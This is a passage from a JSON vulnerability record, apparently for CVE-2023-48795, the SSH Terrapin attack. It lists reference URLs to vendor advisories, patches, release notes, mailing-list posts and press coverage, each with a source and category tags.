"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/proftpd/proftpd/blob/0a7ea9b0ba9fcdf368374a226370d08f10397d99/RELEASE_NOTES"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/proftpd/proftpd/blob/d21e7a2e47e9b38f709bec58e3fa711f759ad0e1/RELEASE_NOTES"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/proftpd/proftpd/blob/master/RELEASE_NOTES"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/proftpd/proftpd/issues/456"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/rapier1/hpn-ssh/releases"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/ronf/asyncssh/blob/develop/docs/changes.rst"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/ronf/asyncssh/tags"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/ssh-mitm/ssh-mitm/issues/165"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/warp-tech/russh/releases/tag/v0.40.2"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://gitlab.com/libssh/libssh-mirror/-/tags"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "https://groups.google.com/g/golang-announce/c/-n5WqVC18LQ"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "https://groups.google.com/g/golang-announce/c/qA3XtxvMUyg"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://help.panic.com/releasenotes/transmit5/"
},
{
"source": "cve@mitre.org",
"tags": [
"Press/Media Coverage"
],
"url": "https://jadaptive.com/important-java-ssh-security-update-new-ssh-vulnerability-discovered-cve-2023-48795/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00017.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00013.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00014.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00016.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/33XHJUB6ROFUOH2OQNENFROTVH6MHSHA/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3CAYYW35MUTNO65RVAELICTNZZFMT2XS/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3JIMLVBDWOP4FUPXPTB4PGHHIOMGFLQE/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3YQLUQWLIHDB5QCXQEX7HXHAWMOKPP5O/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6Y74KVCPEPT4MVU3LHDWCNNOXOE5ZLUR/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/APYIXIQOVDCRWLHTGB4VYMAUIAQLKYJ3/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BL5KTLOSLH2KHRN4HCXJPK3JUVLDGEL6/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C3AFMZ6MH2UHHOPIWT5YLSFV3D2VB3AC/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CHHITS4PUOZAKFIUBQAQZC7JWXMOYE4B/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F7EYCFQCTSGJXWO3ZZ44MGKFC5HA7G3Y/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HYEDEXIKFKTUJIN43RG4B7T5ZS6MHUSP/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I724O3LSRCPO4WNVIXTZCT4VVRMXMMSG/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KEOTKBUPZXHE3F352JBYNTSNRXYLWD6P/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KMZCVGUGJZZVDPCVDA7TEB22VUCNEXDD/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L5Y6MNNVAPIJSXJERQ6PKZVCIUXSNJK7/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LZQVUHWVWRH73YBXUQJOD6CKHDQBU3DM/"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MKQRBF3DWMWPH36LBCOBUTSIZRTPEZXB/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QI3EHAHABFQK7OABNCSF5GMYP6TONTI7/"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://matt.ucc.asn.au/dropbear/CHANGES"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://nest.pijul.com/pijul/thrussh/changes/D6H7OWTTMHHX6BTB3B6MNBOBX2L66CBL4LGSEUSAI2MCRCJDQFRQC"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://news.ycombinator.com/item?id=38684904"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://news.ycombinator.com/item?id=38685286"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://news.ycombinator.com/item?id=38732005"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://nova.app/releases/#v11.8"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://oryx-embedded.com/download/#changelog"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0002"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://roumenpetrov.info/secsh/#news20231220"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://security-tracker.debian.org/tracker/CVE-2023-48795"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://security-tracker.debian.org/tracker/source-package/libssh2"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://security-tracker.debian.org/tracker/source-package/proftpd-dfsg"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://security-tracker.debian.org/tracker/source-package/trilead-ssh2"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202312-16"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202312-17"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20240105-0004/"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://support.apple.com/kb/HT214084"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://thorntech.com/cve-2023-48795-and-sftp-gateway/"
},
{
"source": "cve@mitre.org",
"tags": [
"Press/Media Coverage"
],
"url": "https://twitter.com/TrueSkrillor/status/1736774389725565005"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://ubuntu.com/security/CVE-2023-48795"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://winscp.net/eng/docs/history#6.2.2"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://www.bitvise.com/ssh-client-version-history#933"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://www.bitvise.com/ssh-server-version-history"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://www.debian.org/security/2023/dsa-5586"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://www.debian.org/security/2023/dsa-5588"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://www.freebsd.org/security/advisories/FreeBSD-SA-23:19.openssh.asc"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://www.lancom-systems.de/service-support/allgemeine-sicherheitshinweise#c243508"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://www.netsarang.com/en/xshell-update-history/"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://www.openssh.com/openbsd.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://www.openssh.com/txt/release-9.6"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "https://www.openwall.com/lists/oss-security/2023/12/18/2"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Mitigation"
],
"url": "https://www.openwall.com/lists/oss-security/2023/12/20/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://www.paramiko.org/changelog.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://www.reddit.com/r/sysadmin/comments/18idv52/cve202348795_why_is_this_cve_still_undisclosed/"
},
{
"source": "cve@mitre.org",
"tags": [
"Press/Media Coverage"
],
"url": "https://www.suse.com/c/suse-addresses-the-ssh-v2-protocol-terrapin-attack-aka-cve-2023-48795/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://www.terrapin-attack.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Press/Media Coverage"
],
"url": "https://www.theregister.com/2023/12/20/terrapin_attack_ssh"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://www.vandyke.com/products/securecrt/history.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/176280/Terrapin-SSH-Connection-Weakening.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2024/Mar/21"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/18/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/19/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Mitigation"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/20/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/03/06/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/17/8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/cve-2023-48795"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Press/Media Coverage"
],
"url": "https://arstechnica.com/security/2023/12/hackers-can-break-ssh-channel-integrity-using-novel-data-corruption-attack/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://bugs.gentoo.org/920280"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254210"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1217950"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://crates.io/crates/thrussh/versions"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://filezilla-project.org/versions.php"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://forum.netgate.com/topic/184941/terrapin-ssh-attack"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://git.libssh.org/projects/libssh.git/commit/?h=stable-0.10\u0026id=10e09e273f69e149389b3e0e5d44b8c221c2e7f6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/NixOS/nixpkgs/pull/275249"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/PowerShell/Win32-OpenSSH/issues/2189"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/PowerShell/Win32-OpenSSH/releases/tag/v9.5.0.0p1-Beta"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/TeraTermProject/teraterm/commit/7279fbd6ef4d0c8bdd6a90af4ada2899d786eec0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/TeraTermProject/teraterm/releases/tag/v5.1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/advisories/GHSA-45x7-px36-x8w8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/apache/mina-sshd/issues/445"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/connectbot/sshlib/commit/5c8b534f6e97db7ac0e0e579331213aa25c173ab"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/connectbot/sshlib/compare/2.2.21...2.2.22"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/cyd01/KiTTY/issues/520"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/drakkan/sftpgo/releases/tag/v2.5.6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/erlang/otp/blob/d1b43dc0f1361d2ad67601169e90a7fc50bb0369/lib/ssh/doc/src/notes.xml#L39-L42"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/erlang/otp/releases/tag/OTP-26.2.1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/golang/crypto/commit/9d2ee975ef9fe627bf0a6f01c1f69e8ef1d4f05d"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/hierynomus/sshj/issues/916"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/janmojzis/tinyssh/issues/81"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/jtesta/ssh-audit/commit/8e972c5e94b460379fe0c7d20209c16df81538a5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mitigation"
],
"url": "https://github.com/libssh2/libssh2/pull/1291"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/mkj/dropbear/blob/17657c36cce6df7716d5ff151ec09a665382d5dd/CHANGES#L25"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/mscdex/ssh2/commit/97b223f8891b96d6fc054df5ab1d5a1a545da2a3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://github.com/mwiede/jsch/compare/jsch-0.2.14...jsch-0.2.15"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/mwiede/jsch/issues/457"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/mwiede/jsch/pull/461"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/net-ssh/net-ssh/blob/2e65064a52d73396bfc3806c9196fc8108f33cd8/CHANGES.txt#L14-L16"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/openssh/openssh-portable/commits/master"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/paramiko/paramiko/issues/2337"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/proftpd/proftpd/blob/0a7ea9b0ba9fcdf368374a226370d08f10397d99/RELEASE_NOTES"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/proftpd/proftpd/blob/d21e7a2e47e9b38f709bec58e3fa711f759ad0e1/RELEASE_NOTES"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/proftpd/proftpd/blob/master/RELEASE_NOTES"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/proftpd/proftpd/issues/456"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/rapier1/hpn-ssh/releases"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/ronf/asyncssh/blob/develop/docs/changes.rst"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/ronf/asyncssh/tags"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/ssh-mitm/ssh-mitm/issues/165"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/warp-tech/russh/releases/tag/v0.40.2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://gitlab.com/libssh/libssh-mirror/-/tags"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "https://groups.google.com/g/golang-announce/c/-n5WqVC18LQ"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "https://groups.google.com/g/golang-announce/c/qA3XtxvMUyg"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://help.panic.com/releasenotes/transmit5/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Press/Media Coverage"
],
"url": "https://jadaptive.com/important-java-ssh-security-update-new-ssh-vulnerability-discovered-cve-2023-48795/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00017.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00013.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00014.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00016.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00042.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.debian.org/debian-lts-announce/2024/11/msg00032.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00028.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/33XHJUB6ROFUOH2OQNENFROTVH6MHSHA/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3CAYYW35MUTNO65RVAELICTNZZFMT2XS/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3JIMLVBDWOP4FUPXPTB4PGHHIOMGFLQE/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3YQLUQWLIHDB5QCXQEX7HXHAWMOKPP5O/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6Y74KVCPEPT4MVU3LHDWCNNOXOE5ZLUR/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/APYIXIQOVDCRWLHTGB4VYMAUIAQLKYJ3/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BL5KTLOSLH2KHRN4HCXJPK3JUVLDGEL6/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C3AFMZ6MH2UHHOPIWT5YLSFV3D2VB3AC/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CHHITS4PUOZAKFIUBQAQZC7JWXMOYE4B/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F7EYCFQCTSGJXWO3ZZ44MGKFC5HA7G3Y/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HYEDEXIKFKTUJIN43RG4B7T5ZS6MHUSP/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I724O3LSRCPO4WNVIXTZCT4VVRMXMMSG/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KEOTKBUPZXHE3F352JBYNTSNRXYLWD6P/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KMZCVGUGJZZVDPCVDA7TEB22VUCNEXDD/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L5Y6MNNVAPIJSXJERQ6PKZVCIUXSNJK7/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LZQVUHWVWRH73YBXUQJOD6CKHDQBU3DM/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MKQRBF3DWMWPH36LBCOBUTSIZRTPEZXB/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QI3EHAHABFQK7OABNCSF5GMYP6TONTI7/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/33XHJUB6ROFUOH2OQNENFROTVH6MHSHA/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3JIMLVBDWOP4FUPXPTB4PGHHIOMGFLQE/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3YQLUQWLIHDB5QCXQEX7HXHAWMOKPP5O/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6Y74KVCPEPT4MVU3LHDWCNNOXOE5ZLUR/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/APYIXIQOVDCRWLHTGB4VYMAUIAQLKYJ3/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C3AFMZ6MH2UHHOPIWT5YLSFV3D2VB3AC/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HYEDEXIKFKTUJIN43RG4B7T5ZS6MHUSP/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I724O3LSRCPO4WNVIXTZCT4VVRMXMMSG/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L5Y6MNNVAPIJSXJERQ6PKZVCIUXSNJK7/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
